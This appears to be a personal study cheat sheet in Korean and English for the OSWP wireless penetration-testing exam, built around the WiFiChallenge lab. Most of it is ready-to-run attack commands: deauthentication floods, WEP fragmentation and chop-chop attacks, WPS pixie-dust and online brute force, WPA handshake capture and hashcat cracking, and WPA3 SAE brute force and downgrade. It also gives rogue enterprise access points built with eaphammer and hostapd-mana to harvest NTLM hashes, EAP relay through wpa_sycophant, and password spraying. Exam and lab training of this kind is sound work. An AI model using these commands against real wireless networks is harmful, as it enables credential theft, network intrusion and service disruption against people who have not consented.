
Info
Exam
https://lab.wifichallenge.com/
Resource
https://www.offsec.com/courses/pen-210/ https://lab.wifichallenge.com/ https://pierrelouis.blog/posts/oswp-lab-setup/ https://zeyadazima.com/certificates/oswprg/ https://youtu.be/Ra0dGPYScLQ?si=KMNJr7d0PbI08b8Y
Setting
https://github.com/r4ulcl/WiFiChallengeLab-docker
git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose --file docker-compose.yml up -d
Basic
Settings
# 드라이버 확인
sudo airmon-ng
# USB 장치 나열
sudo lsusb -vv
# 종속성, 호환성 및 펌웨어 요구사항 확인
sudo modinfo ath9k_htc
# 로드된 모듈과 각 모듈의 종속성 나열
lsmod
# 모듈 제거 - 종속되어 있는 모듈을 모두 나열
sudo rmmod <module_name1> <module_name2>
sudo airmon-ng check kill
# Check available interfaces
iwconfig
# Start and stop
sudo airmon-ng start wlan0
sudo airmon-ng stop wlan0mon
# channel 변경
sudo iwconfig [monitor_interface] channel [number]
# MAC 변경
systemctl stop network-manager
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
Wireless Tools
iw util
# 사용 가능한 채널/주파수 표시
sudo iwlist wlan0 frequency
# 더 자세히 표시
sudo iw list
# 채널 설정
sudo iwconfig wlan0mon channel 11
# 사용 가능한 SSID 나열
sudo iw dev wlan0 scan | grep SSID
# iw 스캔 출력 구문 분석을 통해 사용 가능한 SSID 및 채널 나열
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"
# 새 가상 인터페이스(VIF) wlan0mon 생성, 활성화 및 제거
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up
sudo iw dev wlan0mon interface del
# 덤프
sudo tcpdump -i wlan0mon
# 규제 확인 country 00
sudo iw reg get
# 규제 도메인 변경 및 설정 / 영구 변경은 /etc/default/crda에서 REGDOMAIN=US 처럼 입력
iw reg set <COUNTRY>
rfkill
rfkill은 연결된 무선 기기를 활성화 또는 비활성화하는 도구
# 활성화된 모든 Wi-Fi 및 Bluetooth 장치를 표시
sudo rfkill list
# 무선 통신을 비활성화 및 재활성화
sudo rfkill block all
sudo rfkill block <block_id>
sudo rfkill unblock <block_id>
Monitor
--band abg: Scan for networks on 2.4GHz (b and g) and 5GHz (a) bands. -c: network channel. --manufacturer: Display the manufacturer of detected access points. --wps: Display information about WPS. -w output: Write the output to a file named output.
# dump
sudo airodump-ng [monitor_interface] --band abg --manufacturer --wps --bssid [BSSID] -c [channel] -w [output_file]
sudo airodump-ng wlan0mon -w ~/wifi/scan --manufacturer --wps --band abg -c11 --bssid 00:00:00:00:00:00
# AP-mac을 통한 ssid 유추
mdk4 wlan0mon p -t [BSSID] -f [wordlist]
mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f ~/wifi-rockyou.txt
# wifi-db
cd /root/tools/wifi_db
python3 wifi_db.py -d wifichallenge.SQLITE ~/wifi/
sqlitebrowser wifichallenge.SQLITE
Decrypt
# decap : psk 패킷 해독
airdecap-ng -e wifi-mobile -p $PASSWORD ~/wifi/scanc6-02.cap
wireshark ~/wifi/scanc6-02-dec.cap
Connect
conf files 정리된 곳
# wpa_supplicant 사용 전 충돌 방지 필수
sudo systemctl stop NetworkManager
sudo systemctl disable NetworkManager
# network 연결, IP 할당 받기 및 네트워크 내 IP 확인
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
dhclient wlan2 -v
arp-scan -I wlan2 -l
# IP 할당 해제
dhclient wlan2 -r
Open
network={
ssid="Open_Network_Name"
key_mgmt=NONE
}
network={
ssid="[ESSID]"
scan_ssid=1
mode=0
auth_alg=OPEN
key_mgmt=NONE
}
WEP
network={
ssid="SSID"
key_mgmt=NONE
wep_key0=""
wep_tx_keyidx=0
}
network={
ssid="[ESSID]"
scan_ssid=1
mode=0
auth_alg=OPEN
key_mgmt=NONE
wep_key0=0304050607
}
PSK
network={
ssid="[ESSID]"
key_mgmt=WPA_PSK
psk="[passphrase]"
proto=WPA
pairwise=CCMP
group=CCMP
}
network={
ssid="wifi-mobile"
psk="$PASSWORD"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}
SAE
network={
# Connect via WPA3 to a WPA2+WPA3 network
ssid="my_network"
psk="password"
key_mgmt=SAE
ieee80211w=1
}
EAP
eap, phase2_auth는 가변으로 알맞게 설정하면 된다.
PEAP-MSCHAPv2, PEAP-GTC, TTLS-PAP, TTLS-CHAP, TTLS-MSCHAPv2
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
## bssid_blacklist: BSSIDs this client must not associate with, so add your rogue BSSID here.
bssid_blacklist=F0:9F:C2:00:00:00
}
WEP
With Client
# auto
besside-ng -c 1 -b F0:9F:C2:AA:19:29 wlan2 -v
# manual [airodump -> aireplay -> aircrack]
sudo airodump-ng -w [pcap_file_name] --band abg --bssid [mac] -c [channel] wlan0mon
sudo aireplay-ng -1 0 -a [BSSID] -h [Interface_Mac] -e "ESSID" [Interface]
sudo aireplay-ng -3 -b [BSSID] -h [interface_mac_address] [monitor_interface]
sudo aircrack-ng [pcap_file_name].cap
# if not crack
aircrack-ng -w [PASSWORDS_WORDLIST] [pcap_file_name].cap
Without Client
# Fragmentation Attack
airodump-ng -w [CAPTURE_NAME] -c [CHANNEL] --bssid [BSSID] [INTERFACE]
macchanger --show [INTERFACE]
aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [YOUR_MAC] [INTERFACE]
aireplay-ng -5 -b [BSSID] -h [YOUR_MAC] [INTERFACE]
packetforge-ng -0 -a [BSSID] -h [YOUR_MAC] -k 255.255.255.255 -l 255.255.255.255 -y [FRAGMENT_PACKET].xor -w [ARP_PACKET_NAME]
aireplay-ng -2 -r [ARP_PACKET_NAME] [INTERFACE]
aircrack-ng [CAPTURE_NAME]
# Chop Chop Attack - 위에서 -5를 -4로만 하면 됨
aireplay-ng -4 -b [BSSID] -h [YOUR_MAC] [INTERFACE]
WEP-SKA
나중에 할 일 생기면 알아서 찾아보자
WPA, WPA2 & WPA3
# 연결된 client가 없을 경우
# Deauthentication broadcast attack
aireplay-ng -0 1 -a [BSSID] [INTERFACE]
WPS
# Identifying access points with WPS enabled
wash -i <INTERFACE> -s
# Get your MAC address
macchanger --show <INTERFACE>
# Fake authentication attack
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>
# Offline brute force (pixie dust)
reaver -i wlan0 -b 00:06:91:DE:B1:30 -SNLAvv -c 1 -K
# Online brute force
reaver -i <INTERFACE> -b <BSSID> -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>
PSK
# 패스워드 얻는 부류 -> 인증해제 공격 -> 패킷 덤프 -> aircrack
sudo airodump-ng -w [pcap_file_name] --band abg --bssid [mac] -c [channel] wlan0mon
# wait for the re-handshake (client-mac 없어도 됨)
sudo aireplay-ng -0 5 -c [client-mac] -a [BSSID] [interface_in_monitor_mode]
sudo aircrack-ng -w [wordlist] [pcap_file_name].cap
SAE
# brute force
cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462
# downgrade
## [in wireshark pcap] Wireless Management -> RSN Information -> Management Frame Protection Required, Capable의 False 확인 시 인증 해제 가능
## hostapd.conf
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=wifi-offices
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
hostapd-mana hostapd.conf
aireplay-ng [INTERFACE] -0 0 -a [BSSID] -c [CLIENT_MAC]
## If the original is hostapd.hccapx (text):
sed 's/^\[WPA2-EAPOL HASHCAT\][[:space:]]*//' hostapd.hccapx > clean_hashes.txt
hashcat -a 0 -m 2500 clean_hashes.txt ~/rockyou-top100000.txt
WPA Enterprise
Get User Domain
# In Wireshark filter for "eap", then search the "Response, Identity" packets, and then in the section "Extensible Authentication Protocol"
wireshark [SAVED_FILE].cap
# wifi-db 사용
# tshark
tshark -r [SAVED_FILE].cap -Y '(eap && wlan.ra == [BSSID]) && (eap.identity)' -T fields -e eap.identity
Get Server Certificate Email
# In Wireshark use the filter:
(wlan.sa == [BSSID]) && (tls.handshake.certificate)
# pcapFilter
bash pcapFilter.sh -f [SAVED_FILE].cap -C
# tshark
tshark -r [SAVED_FILE].cap -Y "wlan.bssid == [BSSID] && ssl.handshake.type == 11" -V
## (Optional) If we only want to get the IA5String info
tshark -r [SAVED_FILE].cap -Y "wlan.bssid == [BSSID] && x509sat.IA5String" -T fields -e x509sat.IA5String
Get EAP Supported
bash ./EAP_buster.sh [SSID] '[DOMAIN]\[USER]' [INTERFACE]
bash ./EAP_buster.sh wifi-global 'GLOBAL\GlobalAdmin' wlan1
Rogue AP
hostmana
OSWP 합격 보고서 참고
NTLM dump
# 인증서 설치
cd /root/tools/eaphammer
python3 ./eaphammer --cert-wizard
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced
# 기존 모든 AP에 연결해제 공격 -> Rogue AP에 붙도록 유도
iwconfig wlan0mon channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon -c 64:32:A8:07:6C:40
airmon-ng start wlan1
iwconfig wlan1mon channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan1mon -c 64:32:A8:07:6C:40
# 해시 크랙 / bulldogs1234
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou-top100000.txt --force
Relay
# mac변경
airmon-ng stop wlan1mon
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up
# Shell 1 : Rogue AP
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo wifi-regional-tablets
# Shell 2 : 인증 해제
airmon-ng start wlan0
iwconfig wlan0mon channel 44
aireplay-ng -0 0 wlan0mon -a F0:9F:C2:7A:33:28 -c 64:32:A8:A9:DE:55
# Shell 3
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3
# Brute Force
cd ~/tools/air-hammer
echo 'CONTOSO\test' > test.user
./air-hammer.py -i wlan3 -e wifi-corp -p ~/rockyou-top100000.txt -u test.user
# Password Relay
cat ~/top-usernames-shortlist.txt | awk '{print "CONTOSO\\" $1}' > ~/top-usernames-shortlist-contoso.txt
./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u ~/top-usernames-shortlist-contoso.txt
Captive & Responder
./eaphammer --essid WiFi-Restaurant --interface wlan4 --captive-portal
./eaphammer --essid WiFi-Restaurant --interface wlan2 --hostile-portal
WireShark
Local Capture
# Wi-Fi 어댑터를 모니터 모드로 설정
sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up
# channel hop & quickly scan all channels on 2.4GHz
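# Hop through the 2.4 GHz channels (non-overlapping 1/6/11 first) so a
# capture running on the monitor interface sees each channel for ~1 s.
# NOTE(review): the three lines above put wlan0 itself into monitor mode,
# while this loop drives wlan0mon (the name airmon-ng start/stop uses
# elsewhere in these notes) — confirm which interface name is live.
for channel in 1 6 11 2 7 10 3 8 4 9 5; do
  # quoted so the value is never word-split or globbed (SC2086)
  iw dev wlan0mon set channel "$channel"
  sleep 1
done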
## channel hop 2
sudo airodump-ng wlan0mon
# all interface
sudo wireshark -D
# interface capture start & Monitor Mode & filter
sudo wireshark -i <interface> -k -I -f "<filter>" -s <byte length>
# pcap open
wireshark file.pcap
Remote Capture
sudo tcpdump -U -w - -i wlan0mon | wireshark -k -i -
Filter
# 0, 1, 2, 3 -> 관리, 제어, 데이터, 확장 프레임
wlan.fc.type==2
!(wlan.fc.type == 1)
# 장치 필터링 & 비콘 & 프로브(요청 및 응답) & 연관성(요청 및 응답) & 데이터
((wlan addr1 3A:30:F9:0F:E1:95) or (wlan addr2 3A:30:F9:0F:E1:95) or (wlan addr3 3A:30:F9:0F:E1:95) or (wlan addr4 3A:30:F9:0F:E1:95)) and not (subtype beacon) and not (type ctl) and not (subtype probe-req) and not (subtype probe-resp)